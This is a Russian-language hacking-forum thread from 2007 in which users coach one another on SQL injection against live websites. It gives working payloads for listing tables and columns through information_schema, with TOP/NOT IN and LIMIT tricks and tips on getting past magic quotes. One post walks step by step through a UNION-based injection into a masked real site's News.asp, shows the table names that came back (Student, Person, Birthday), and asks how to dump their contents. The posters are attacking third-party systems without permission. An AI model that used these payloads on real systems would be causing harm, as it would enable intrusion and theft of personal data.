SQL-injections

Gnu_sS

Guest

Это нравится:0 Да/0 Нет

22.09.2007 10:41:23

При проведении атаки делаю запрос вида
table_name,column_name from information_schema.columns , но БД выдаёт имя только первой таблицы и колонки CHARACTER_SETS и CHARACTER_SETS_NAME. Вопрос как построить запрос чтобы вытащить остальные имена колонок и таблиц. Если такой вопрос уже обсуждался то дайте ссылку на тему плзз. Заранее спасибо!!

Shanker

мастер

Сообщений: 1446 Баллов: 1464 Регистрация: 28.09.2003

всего лишь человек...

Это нравится:0 Да/0 Нет

23.09.2007 10:48:48

Попробуй выполнить:

Цитата
SELECT TOP 10 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

После такого запроса в ошибке будет известно о имени таблицы

Потом выполни:

Цитата
WHERE TABLE_NAME NOT IN ('current_table')--

current_table - имя таблицы из ошибки

Кстати, я так думаю, твой запрос, что ты приводил выше, некорректен. Правильно будет так:

Цитата
column_name from information_schema.columns WHERE TABLE_NAME='your_table_name'--

"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."

Gnu_sS Guest	#3 Это нравится:0 Да/0 Нет 26.09.2007 21:46:51 Благодарю, Shanker, буду пробовать.А если включено magiс quotes запрос проканает или хитрить придётся?

Shanker мастер Сообщений: 1446 Баллов: 1464 Регистрация: 28.09.2003 всего лишь человек...	#4 Это нравится:0 Да/0 Нет 27.09.2007 00:55:36 Хм... да вроде сработает и так... В крайнем случае эксперементируй с перекодировкой и прочим "Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."

Gnu_sS Guest	#5 Это нравится:0 Да/0 Нет 27.09.2007 23:01:47 OK всё работает на ура!!! Shanker, спасибо ещё раз, имена таблиц и колонок выскакивают как пули. Только какого хрена они делают такие огромные БД http://www.securitylab.ru/bitrix/images/forum/smile/1111419143.gif

Gnu_sS Guest	#6 Это нравится:0 Да/0 Нет 30.09.2007 00:36:08 Чёрт, а из одной таблицы как все поля по очереди вытащить??Первое поле user_id выдаёт а больше ничего?! Как быть!!

Gnu_sS Guest	#7 Это нравится:0 Да/0 Нет 02.10.2007 22:20:49 ОК, пошёл учить матчасть, до встречи

0nep@t0p

Guest

Это нравится:0 Да/0 Нет

03.10.2007 11:59:53

Gnu_sS Используй LIMIT в конце запроса, например,

Код
table_name,column_name from information_schema.columns limit 2,11/*

Это чтобы выбрать 2-ое поле, чтобы выбрать 3-е пиши

Код
table_name,column_name from information_schema.columns limit 3,11/*

И так далее по этой же схеме

Gnu_sS Guest	#9 Это нравится:0 Да/0 Нет 14.10.2007 23:35:56 Респект 0nep@t0p, пробую-получается, спасибо всем за дельные советы!!!

Sergey Grekov

Guest

#10

Это нравится:0 Да/0 Нет

21.10.2007 22:18:20

Всем Здравствуйте! Нашел дырку в БД…

Код
http://******/news/News.asp?start=26/9/2007&finish=3/10/2007&search=&view=list&count=&start_=on&finish_=on&name=[COLOR=red]-1'[/COLOR]uni&slice=True

Потом… подобрал поля

Код
http://******/news/News.asp?start=26/9/2007&finish=3/10/2007&search=&view=list&count=&start_=on&finish_=on&name=[COLOR=red]-1'+union+select+1--[/COLOR]uni&slice=True

(всего одно)
Дальше…

Код
http://******/news/News.asp?start=26/9/2007&finish=3/10/2007&search=&view=list&count=&start_=on&finish_=on&name=[COLOR=red]-1'+union+select+@@version--[/COLOR]uni&slice=True

Код
….. -1'+union+select+table_name+from+information_schema.tables—

Выдало: Abonent

Код
….. -1'+union+select+column_name+from+information_schema.columns—

Выдало: AbonentCategoryCode

Код
1'+union+select+table_name+from+information_schema.tables+WHERE+TABLE_NAME%20NOT%20IN%20('Abonent')--

Выдало: AbonentAlias

Код
1'+union+select+TOP%2010%20table_name+from+information_schema.tables+where+table_name%20NOT%20IN('')--

Выдало: CorrectedStudentAUAsso

Код
1'+union+select+TOP%2010%20column_name+from+information_schema.columns+where+table_name%20NOT%20IN('')--

Выдало: CancelSync

Код
1'+union+select+TOP%2010%20column_name+from+information_schema.columns+where+table_name=('Student')--

Выдало: PersonRoleId

Код
1'+union+select+TOP%2010%20column_name+from+information_schema.columns+where+table_name=('AUAsso')--

Выдало: AUIdChild

Код
1'+union+select+TOP%2010%20column_name+from+information_schema.columns+where+table_name=('Person')--

Выдало: Birthday
А что дальше делать…. Как узнать содержимое таблиц и колонок?

Евгений Щуцкий Guest	#11 Это нравится:0 Да/0 Нет 20.11.2007 02:53:42 лан, эт все понятно и легко!Information_schema это удовольствие только с 5 версии, а вот что делать коли нету этой таблицы??? есть проги какие нить для брутфорса??? я небольшой скриптик написал, но все равно ручками таблицы вбивать затраклсо(((

Логин:
Пароль:
	Запомнить меня на этом компьютере

Забыли свой пароль?